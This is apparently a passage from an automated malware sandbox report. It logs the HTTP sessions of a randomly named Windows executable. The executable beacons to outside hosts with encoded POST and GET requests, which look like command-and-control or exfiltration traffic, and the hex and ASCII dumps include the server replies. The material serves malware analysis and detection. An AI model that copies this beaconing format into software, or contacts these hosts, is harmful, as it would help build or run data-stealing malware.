                                                                              Data Ascii: d%u&i^iRU~X`q2D!PT,_K06B`YffDU.+AS9`"sNwelcp3<82-4eyz?rhVXX9moTv['"""O234N@_@*-M7Mc:m}'1#jLQ;o[v7{
                                                                              Jan 10, 2025 18:54:16.487497091 CET1236INData Raw: 31 34 39 0d 0a ec 9d c1 0a 82 40 14 45 7f c5 4f 90 48 c8 65 b4 70 53 db 5a 9b 0e 3a 31 2a a4 24 f8 f5 a1 99 8d 4a a0 11 a8 75 b6 ba bb a0 87 77 e7 ce 7d 0c 31 b0 e5 03 b6 58 6e 91 09 2f 10 91 9e 61 de 96 cf 0c 47 44 5c cc 1c 04 96 97 5e 70 05 ae
                                                                              Data Ascii: 149@EOHepSZ:1*$Juw}1Xn/aGD\^pb(WcUu fMavb>xv;IO-/saQO?%YiRH7N"aF-5s6_q6:LbS<n^zUY=BqepP^
                                                                              Jan 10, 2025 18:54:16.487517118 CET351INData Raw: 79 32 05 1d 68 f3 9d 73 1c ce eb 46 35 d3 fa c5 70 5e 0b ba 53 0d 00 e3 54 c1 bc eb 15 e6 6e e6 da da cd 5c 7b d9 cd 5c 83 2a 41 51 c5 67 73 0e 6e e6 a8 91 a2 54 f5 cc ea 5a cc da 62 4a 55 83 41 f7 72 7c 01 b4 38 a1 65 a6 59 a8 a6 80 95 65 0a 58
                                                                              Data Ascii: y2hsF5p^STn\{\*AQgsnTZbJUAr|8eYeXy10wDr2M}|#uOWw\.XhI,$^-_*P*5eUV]f;r3S/)3Cs}bjE1jb\8FX|t]yn@2G
                                                                              Jan 10, 2025 18:54:16.490880013 CET1236INData Raw: 33 61 63 0d 0a ec 9d df 6e d3 30 18 c5 5f c5 8f 90 a5 0d 0d 97 ac 8c 49 c0 a4 69 c0 90 b8 73 1d 2f 09 75 e2 ca 4e ba 75 4f 8f 9c 21 ea cc 9b e4 4a 16 24 f8 dc ba 77 9f d4 fe fa fd 39 e7 4c 08 41 cb a5 a3 ec 5f 06 51 f6 2f 31 47 8b f0 b0 0b 73 34
                                                                              Data Ascii: 3acn0_Iis/uNuO!J$w9LA_Q/1Gs4 (].xcq%Y?}PYfzl;ND5L4{;"StGY=WW7#gafafD:4}~de)2{6nF5k_3 <}&^,6|e/'
                                                                              Jan 10, 2025 18:54:16.490901947 CET609INData Raw: 2f ae 6b 19 7f 49 a1 bf 49 6d 16 c7 2d 8e c1 fc 3e c2 ef 0e 2f da 58 8c 53 16 73 08 d2 16 73 c0 35 98 24 3f f7 30 2e 03 77 74 be 3b 8f da b0 e1 74 ea 45 6e 33 9b fe 32 49 85 64 8c 3f af b9 0d 2c ce a2 7e 27 d0 5f 04 09 f4 17 08 f4 27 28 ab e3 70
                                                                              Data Ascii: /kIIm->/XSss5$?0.wt;tEn32Id?,~'_'(p2e'o'1E} ql=8bDC?QE!%QIIeyr@F~terrzd4_v&&;-b,;18cj0DE?PnB^zZ#
                                                                              Jan 10, 2025 18:54:16.502831936 CET934INData Raw: 31 63 66 0d 0a ec 9d 41 6a c3 30 14 44 af a2 23 d8 8e 1d 65 ed 2e d2 45 0b 85 9c 40 76 8c a4 60 4b a1 f2 a2 f4 f4 c5 81 12 b9 c2 20 83 a0 96 35 5b 6d 12 fe e6 f1 3d f3 67 b6 c2 94 bc 74 ce fc cb 20 67 fe 25 2c 64 29 9e a4 20 46 06 aa 4b d6 6a 33
                                                                              Data Ascii: 1cfAj0D#e.E@v`K 5[m=gt g%,d) FKj3eFXy<fhZYz9}\s^8d9!1'2X,l";&Y_!W,VP'%imeql.E90q3uw&nZq11>,f\q WHWN
                                                                              Jan 10, 2025 18:54:16.527137995 CET1236INData Raw: 33 64 32 0d 0a ec 9d 5f 6b 22 31 14 c5 bf 4a 9e dc a7 82 7f 8a 33 3e ae 75 b1 2c 2d 0b b5 d0 e7 d8 89 3a 18 93 21 c9 e0 da 4f bf c4 52 1a 9b 5a 22 84 6a 36 e7 35 f6 e9 82 fd 79 ef 39 f7 5c 74 2a ff 6d 0c cc 17 58 41 10 cc a9 5c f9 c6 14 98 e8 c7
                                                                              Data Ascii: 3d2_k"1J3>u,-:!ORZ"j65y9\t*mXA\{^c=lS~9k5.m%_nT1V%H/Xwxg3L#(Xbjd+*-q9Ax9Y9c+C62gJ-K)=[RLHR=y0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.849713104.21.28.65805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:54:18.272700071 CET1783OUTPOST /9fei/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 1243
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.binjai77rtp11f.xyz
                                                                              Origin: http://www.binjai77rtp11f.xyz
                                                                              Referer: http://www.binjai77rtp11f.xyz/9fei/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Data Raw: 69 72 43 78 6c 36 3d 77 6a 59 73 51 37 79 68 6e 39 72 4a 67 32 45 52 6b 74 5a 49 46 31 6a 58 31 71 6b 2b 76 42 51 57 4f 4f 54 6f 4d 2b 49 43 52 43 34 74 4a 34 54 4d 48 47 79 6e 32 53 5a 4f 77 6b 37 54 6e 65 66 4f 69 4e 43 6b 71 6c 51 35 67 76 33 73 4f 57 4b 38 4e 2f 51 4f 5a 58 78 36 4d 53 48 4a 4d 37 69 38 57 75 54 37 50 34 70 65 42 57 54 48 50 33 53 52 48 61 50 6e 31 65 51 38 42 63 4b 6f 44 4f 6f 6f 58 62 4a 33 46 61 51 46 74 48 6f 68 51 47 34 34 54 4d 4c 6d 6c 2f 7a 65 38 34 75 37 49 34 43 64 4f 65 53 5a 6e 34 42 6c 66 68 44 55 57 39 2b 76 54 77 34 43 77 4f 4b 65 32 36 73 30 2f 6f 56 56 63 51 51 72 58 66 53 42 35 44 50 63 6d 35 6b 51 55 57 43 45 34 50 54 51 36 68 72 45 78 70 34 5a 6f 48 6d 36 68 50 4d 65 6a 4d 72 2b 32 57 47 35 41 6d 48 7a 63 4d 75 77 46 65 32 7a 6d 45 61 4c 66 70 51 67 6d 39 68 44 46 56 36 74 45 4a 6a 36 6e 75 74 72 6d 70 2f 63 37 77 79 6d 74 6d 64 34 38 59 4e 37 53 70 35 70 6b 76 4b 52 78 5a 7a 47 71 65 6a 78 6a 61 76 52 54 52 48 79 57 72 7a 6e 61 7a 61 41 77 50 53 63 6d 33 4e [TRUNCATED]
                                                                              Data Ascii: irCxl6=wjYsQ7yhn9rJg2ERktZIF1jX1qk+vBQWOOToM+ICRC4tJ4TMHGyn2SZOwk7TnefOiNCkqlQ5gv3sOWK8N/QOZXx6MSHJM7i8WuT7P4peBWTHP3SRHaPn1eQ8BcKoDOooXbJ3FaQFtHohQG44TMLml/ze84u7I4CdOeSZn4BlfhDUW9+vTw4CwOKe26s0/oVVcQQrXfSB5DPcm5kQUWCE4PTQ6hrExp4ZoHm6hPMejMr+2WG5AmHzcMuwFe2zmEaLfpQgm9hDFV6tEJj6nutrmp/c7wymtmd48YN7Sp5pkvKRxZzGqejxjavRTRHyWrznazaAwPScm3NFtPLv0/5eR/9ncV0cmqWxVKRfSGXsUyNSzlb0XWIGErW6cUaHQ6JsrF9wKVAgU6ptaPRUj26D+3jvzCLcRzIY2AuHiO90HRJmVKnFAPfBSzOX+JTmuAywGEjNVraNY2aWueqDo1r3LPLFiEjboK0rbqR5/5m5LrrC914+AtUgM2ph4QUDT4hT+xPHIqM34voi1/oEfp/t21clmU5rhMM3vCj7180E3CdYsNHp1PBfdeC5oWslxfvF9HTlnJZlOLqZtuCA5pYZMebpcw9u01OKU2nuN7gPNYkO0rRUkhn1UQxtzHJnuLds/0qH/RkwT25Ub/yb3aTQAP/WCzNtfXJW+lP9uCIFI5fU51wdt4SUEw6PJxGMeOOvIz1ex8WCwh7SaINye8u4DzYNLAN7ONYxvGvxssAWYHyC8sepmnyzmdW2TZnmBEowi+dP3qoDsV1EyKEzwVI8ST/MQtIRTqglnZAQArzigYyhR8FGOn8i1lyWyxqVSGWBRGRYmc/B5yoMWOeqRJZEUrITB4tZZbcz/7561JKpAiiQuM/A/ok96H5YPEQFi3/TEreATwH+8hS9i6YZIGTBKZi/7W7EZy2TVU3JHtENQUE1dkiZ4CtsNcovwmU0NRI/Q0hjMILRJ0ALQz84F7Uk48/8aJiUp5HiBPE+zNhK6zgkZ [TRUNCATED]
                                                                              Jan 10, 2025 18:54:18.902743101 CET1236INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 17:54:18 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c4QTqMZ9nr9HY106dhGdfu77qXcWVmkqOn5WL6f1sqErnvUowKnPeLJ35SlMVfvEoTLIdKsskSZHBuWOPEgI9hFvuIT8c2wH2Bzrvs0%2BHXaVwU8R9259wUQoroZv3QZobsUqVUeEHuqo"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ffe8813186343b5-EWR
                                                                              Content-Encoding: gzip
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1665&min_rtt=1665&rtt_var=832&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1783&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 36 30 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 57 5b 73 1a b9 12 7e 4e aa f2 1f 7a e7 54 ed 13 62 8c 13 af 4f ed 82 2b e0 78 1d bc 04 53 86 ec b9 bc f5 8c 9a 41 b6 46 9a 95 04 98 ad fc f8 53 9a e1 32 80 01 3b 27 55 f6 83 79 60 46 ad ee 56 ab fb d3 d7 9a 77 6f eb 3f 7d ba 3e 1f fc a7 77 01 23 97 ca b3 77 6f eb fe 09 12 55 d2 08 48 05 67 ef de 02 00 d4 47 84 7c fe 9e 8f 7f 62 0c 9c 70 92 80 b1 b2 3c 97 9d dd 0c 7a d0 69 ff 79 01 ad 76 f7 aa d9 3e 3d 85 6f d0 ba 3e bf be 69 76 a1 f9 e9 4b bb 0b fd ce f5 00 2e 9b e7 d7 37 f0 b9 79 d3 86 76 b7 0d df 60 65 37 57 2e d9 97 2c 2e 9b 5f 7a cd ee 25 7c b9 e8 fa c7 e0 e2 e6 6b ef 53 73 70 51 0f 8b e5 37 e2 4c c9 e1 46 98 b9 28 1e a1 b1 e4 1a c1 d7 c1 ef ec 9f c1 d6 bc c2 94 1a c1 44 d0 34 d3 c6 05 10 6b e5 48 b9 46 30 15 dc 8d 1a 9c 26 22 26 96 0f 2a 20 94 70 02 25 b3 31 4a 6a d4 aa 47 db fe 46 ce 65 8c fe 1a 8b 49 23 f8 37 fb da 64 e7 3a cd d0 89 48 52 c9 79 fb a2 41 3c a1 fd e6 31 c6 23 62 de c6 68 59 32 56 9a e5 53 fb ad 33 83 49 8a 4f 36 a3 fb 4c 18 b2 25 [TRUNCATED]
                                                                              Data Ascii: 60bW[s~NzTbO+xSAFS2;'Uy`FVwo?}>w#woUHgG|bp<ziyv>=o>ivK.7yv`e7W.,._z%|kSspQ7LF(D4kHF0&"&* p%1JjGFeI#7d:HRyA<1#bhY2VS3IO6L%]Idc#2'*[s}\+)LF&G-Tt F+VCYYl"8)7h6
                                                                              Jan 10, 2025 18:54:18.902765989 CET1236INData Raw: 37 da 12 ea 16 c5 e9 69 05 8c cb 60 35 5a bc 79 71 65 6b e1 ca 5a 14 3a df 44 05 a2 ad fd 55 c0 fa 74 2c 14 6c 9e a6 35 51 be cd 07 94 96 f2 60 13 f4 52 a8 bb 02 f4 6f 72 59 3e 36 24 3d 76 94 56 22 46 19 c0 c8 d0 b0 11 f8 1a db 5f c3 d0 8e b4 71
                                                                              Data Ascii: 7i`5ZyqekZ:DUt,l5Q`RorY>6$=vV"F_qj$twkNWDZl(RLCjmg>kGDn3$TPeii3}P=.]MTSYPS:pjZG)<,[9c?Kb6(a
                                                                              Jan 10, 2025 18:54:18.902785063 CET116INData Raw: 80 31 62 d6 d8 58 a1 a0 08 6d 75 00 64 25 49 11 68 f1 c8 40 2f 14 c8 4b ad 28 a1 ee 42 01 90 89 34 5d 28 e0 97 5a 51 42 c7 45 02 f8 e4 49 59 12 85 7f 89 1a e1 a5 69 f8 96 a4 25 a1 2e 49 b3 c9 30 24 b0 7c 09 6d a9 15 91 ab 99 a0 6b ad c0 4b db 4b
                                                                              Data Ascii: 1bXmud%Ih@/K(B4](ZQBEIYi%.I0$|mkKK2r+1bF?uAK7+
                                                                              Jan 10, 2025 18:54:18.984308004 CET1236INData Raw: 33 65 61 0d 0a ec 9d d1 6e 9b 30 14 86 5f c5 8a 54 f5 2a 0a d0 a4 24 5d 1b a9 eb 5a 69 d2 ba 55 ea b4 6a 97 26 38 09 ab b1 23 6c 42 e8 d5 5e 63 af b7 27 99 0c a4 31 10 12 b6 21 02 8d 6f aa d6 32 8e 73 6c 9f 4f e7 9c df b4 58 74 27 e4 11 1b 4d 44
                                                                              Data Ascii: 3ean0_T*$]ZiUj&8#lB^c'1!o2slOXt'MDg=t;vw*L]3At."@;lm+>Zv_(7>c[stp_X,!s<9XUP2Oat{'qy$@lUB;I)+k)<6
                                                                              Jan 10, 2025 18:54:18.984329939 CET283INData Raw: 64 7f 16 cd 3c 00 00 00 ff ff 0d 0a 61 37 0d 0a 1a ad 58 06 6c db 65 7e 5e 6a 65 6e 62 1e 52 d5 12 92 91 aa e0 0b 12 56 f0 4d cd 1b 9d 9b 21 a9 96 c1 1e 76 43 75 71 99 39 46 9d 63 4e 95 3a c7 7c b4 ce 19 ad 73 46 eb 9c 91 58 e7 98 18 a4 a4 e6 e6
                                                                              Data Ascii: d<a7Xle~^jenbRVM!vCuq9FcN:|sFX )KFeTYl82-y<^AIJLNEVPwd&nCcf^R13Q5cLF'GI99IyUHSfSbqG"Ugg0m
                                                                              Jan 10, 2025 18:54:18.989336967 CET1236INData Raw: 31 33 38 0d 0a ec 9d 41 0a c2 30 14 44 af d2 23 48 24 b4 37 70 e1 46 5c b9 8d 2e ac 60 15 9a 16 7a 7c 89 60 ad c6 48 5b 03 26 e4 6d db 5d d0 0e ff cd cc 8f 23 ba 1c 25 31 13 56 4d 46 78 a9 c9 08 6a 32 d4 64 10 99 54 63 cb 8d aa cf e6 0f 36 a4 66
                                                                              Data Ascii: 138A0D#H$7pF\.`z|`H[&m]#%1VMFxj2dTc6fg>]EsvEj&fhgrgL}!Sxii4ds#.cv:J1pFx`)7$&R}EelES0eTGQ5>x
                                                                              Jan 10, 2025 18:54:18.989667892 CET308INData Raw: 1b 30 27 6c e5 a5 b7 76 30 65 c2 94 f9 ed ab fe 06 00 00 ff ff 0d 0a 31 31 36 0d 0a ec 9d b1 0e 82 30 14 45 7f a5 9f 20 09 09 71 55 06 17 37 7e a0 48 85 06 03 86 42 4c ff de d4 c5 02 4b 4d 18 6c 38 6b bb bd e5 e4 dd 77 df 7d 2c 65 42 9c 3f 54 d6
                                                                              Data Ascii: 0'lv0e1160E qU7~HBLKMl8kw},eB?T?)%4(Ldf%Y%.)Ye;*.kYi0(Xd%he;bO]8'`3P$[T-&[Q&22PfK'F}Xqq_p&H'[T^3fxR
                                                                              Jan 10, 2025 18:54:19.039187908 CET1236INData Raw: 33 63 38 0d 0a ec 9d 4f 4f db 40 10 c5 bf ca de 7a 4d 68 ec 38 c7 92 16 10 6a 2b 5a aa d2 1e d7 ce 62 9b d8 5e 6b ff 24 b8 9f be 72 68 90 9d 85 6a 91 56 90 d5 be eb 3a a7 27 a1 1f 33 f3 de 0c d0 e2 e6 12 99 54 54 b4 a5 a0 8a 1d 1c bd 24 57 bb 57
                                                                              Data Ascii: 3c8OO@zMh8j+Zb^k$rhjV:'3TT$WWI|l@4$e+:Z\4Bi"`rAN~OY`\lgN3'parHp:f4mt:-srigTL$7#7`nC<IEY\$}h_]o[,
                                                                              Jan 10, 2025 18:54:19.039208889 CET676INData Raw: 02 61 82 10 e6 dc b0 34 e3 00 0a 2f 0e a0 88 12 07 50 60 3b f6 82 db 31 18 78 62 88 99 ce 10 b3 97 46 6c 6b 07 56 1e 5b 4e be d8 22 35 9c d4 40 96 10 64 b9 ec 59 9a e0 e2 f9 65 ce a2 f8 65 ce f2 f0 cb fc 7f 36 53 31 19 20 8c 2d 59 df 2f 2b d5 d1
                                                                              Data Ascii: a4/P`;1xbFlkV[N"5@dYee6S1 -Y/+'/JuV~A>~J6M$h"A0+.oG=SbJ$2SX1ua~>e1aiJo?VF]"=pTCR^Jr;V,AsLg28ah*
                                                                              Jan 10, 2025 18:54:19.116373062 CET1236INData Raw: 33 37 64 0d 0a ec 9d cd 6e db 30 10 84 5f 85 2f 50 40 51 24 4b 67 07 ad 63 f4 07 01 8c 5e 7a a3 64 56 62 22 91 06 29 a7 75 9e be 90 9a 20 b4 08 03 74 c1 b6 66 38 57 da 40 82 3d f8 c3 ee cc ce 02 30 7f 47 91 f9 ce 15 d3 83 e2 0f cc 6c 5d 3e 70 c5
                                                                              Data Ascii: 37dn0_/P@Q$Kgc^zdVb")u tf8W@=0Gl]>pfz&):[XH$_thOoSa C22cLs-o:&wtPtjANrbI#+6&dV LMk\Xsx-@Pe g
                                                                              Jan 10, 2025 18:54:19.116511106 CET160INData Raw: a8 cd e7 0f c0 4c 08 66 c6 35 c3 54 06 53 19 10 06 84 01 61 16 95 61 aa 5d 3f c0 cb da 30 41 0b 13 8e 96 9f 7a c5 89 15 af 3b 96 8b 74 c7 f2 34 ba 63 b7 f2 6f 7e 23 ed 31 78 c6 d0 1d 9b 55 f5 25 9c c0 05 73 25 4f a2 15 c1 68 4f 5e a9 45 e4 95 1a
                                                                              Data Ascii: Lf5TSaa]?0Az;t4co~#1xU%s%OhO^EL?)p\D0}/(6K0(+\#~8g"3lSN}


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.849714104.21.28.65805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:54:20.816381931 CET474OUTGET /9fei/?irCxl6=9hwMTPf/o+GewSNr0PZcNyjUpNs4oV11JaaOJ/4hdktbA5fMK3ajxj9W7lKuvaKLl9eyr3kbg9/8Pn7CG+MHPzFPLCnPEL+bBN+DL4U4BkbYG2HsYKvT3cQqMuOVV8lKBQ==&0FJ=D00hHLh HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              Host: www.binjai77rtp11f.xyz
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                                                                              Jan 10, 2025 18:54:21.518702030 CET1236INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 17:54:21 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rlTS20PB5ocTQJBAe1iUqhQuFIW8xlYA5wGZjxCC7DH7dK9kYeQo9z9nP%2FB6otIkI5Qf6KIwc5E3ko6sdmDaQB9qDUiqfI%2FMj6hWyxcHdhQpmkM19wcs4z5GCarZdggChGDeu27rZgbm"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8ffe88238aa54405-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8658&min_rtt=8658&rtt_var=4329&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=474&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 31 66 63 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 74 69 74 6c 65 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 52 54 50 20 4c 49 56 45 20 42 49 4e 4a 41 49 37 37 20 7c 20 42 4f 43 4f 52 41 4e 20 41 44 4d 49 4e 20 53 4c 4f 54 20 47 41 43 4f 52 20 48 41 52 49 20 49 4e 49 20 7c 20 52 54 50 20 4c 49 56 45 20 42 4f 43 4f 52 41 4e 20 42 49 4e 4a 41 49 37 37 20 7c 20 53 4c 4f 54 20 47 41 43 4f 52 20 47 41 4d 50 41 4e 47 20 4d 45 4e 41 4e 47 20 54 45 52 55 50 44 41 54 45 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 6d 65 74 61 20 2d 2d 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 [TRUNCATED]
                                                                              Data Ascii: 1fc1<!DOCTYPE html><html lang="en"> <head> ... title --> <title>RTP LIVE BINJAI77 | BOCORAN ADMIN SLOT GACOR HARI INI | RTP LIVE BOCORAN BINJAI77 | SLOT GACOR GAMPANG MENANG TERUPDATE</title> ... meta --> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta http-equiv="cache-co
                                                                              Jan 10, 2025 18:54:21.518754959 CET1236INData Raw: 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d
                                                                              Data Ascii: ntrol" content="no-cache"> <meta http-equiv="pragma" content="no-cache"> <meta http-equiv="expires" content="0"> <meta name="description" content="Situs Judi Slot Online Terpercaya dan Bandar Live casino Online Terpe
                                                                              Jan 10, 2025 18:54:21.518794060 CET1236INData Raw: 73 3d 22 74 65 78 74 2d 77 68 69 74 65 20 6d 62 2d 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 53 65 6c 61 6d 61 74 20 64 61 74 61 6e 67 20 64 69 20 42 4f 20 70 61 6c 69 6e
                                                                              Data Ascii: s="text-white mb-0"> <span>Selamat datang di BO paling Bonafit Se Indonesia BINJAI77 kami menerima deposit VIA BANK, deposit VIA PULSA dan VIA E-WALLET tersedia game populer seperti Live casino, Slot, Casino, Sport
                                                                              Jan 10, 2025 18:54:21.518829107 CET1236INData Raw: 41 20 52 54 50 20 4c 49 56 45 20 47 41 43 4f 52 20 7c 20 42 49 4e 4a 41 49 37 37 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 35 20 63 6c
                                                                              Data Ascii: A RTP LIVE GACOR | BINJAI77</span> </div> <h5 class="text-white text-center font-weight-bolder mb-3"> <span><i class="fa fa-calendar-alt"></i>&nbsp;</span> <span>Sabtu
                                                                              Jan 10, 2025 18:54:21.518866062 CET896INData Raw: 70 78 2d 6c 67 2d 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: px-lg-0"> <div class="col px-1 carousel-item active"> <div class="card-provider">
                                                                              Jan 10, 2025 18:54:21.518918037 CET1236INData Raw: 61 67 65 73 2f 70 72 6f 76 69 64 65 72 73 2f 50 47 2e 70 6e 67 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20
                                                                              Data Ascii: ages/providers/PG.png"> </a> </div> </div>
                                                                              Jan 10, 2025 18:54:21.518955946 CET224INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20
                                                                              Data Ascii: <div class="col px-1 carousel-item "> <div class="card-provider">
                                                                              Jan 10, 2025 18:54:21.518986940 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 4a 47 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                              Data Ascii: <a href="/JG"> <img class="img-provider w-100" src="assets/images/providers/JG.png"> </a>
                                                                              Jan 10, 2025 18:54:21.519023895 CET382INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a
                                                                              Data Ascii: </a> </div> </div> <div class="col px-1 carousel-item ">
                                                                              Jan 10, 2025 18:54:21.527939081 CET1236INData Raw: 31 31 35 63 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d 70 72 6f 76 69 64
                                                                              Data Ascii: 115c <img class="img-provider w-100" src="assets/images/providers/MG.png"> </a> </div>
                                                                              Jan 10, 2025 18:54:21.528001070 CET1236INData Raw: 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: </a> </div> </div> <div class="col px-1 carousel-item ">


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.849715172.67.138.138805180C:\Program Files (x86)\WZaRJgWqaZnlanYMugHJJfSBsdZDToQmpSEoBNFKchcsoSZJVF\kwRriiLHUBrBci.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 18:54:27.376734972 CET737OUTPOST /wmxx/ HTTP/1.1
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-us
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Cache-Control: no-cache
                                                                              Content-Length: 207
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Host: www.vietnamtour.pro
                                                                              Origin: http://www.vietnamtour.pro
                                                                              Referer: http://www.vietnamtour.pro/wmxx/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
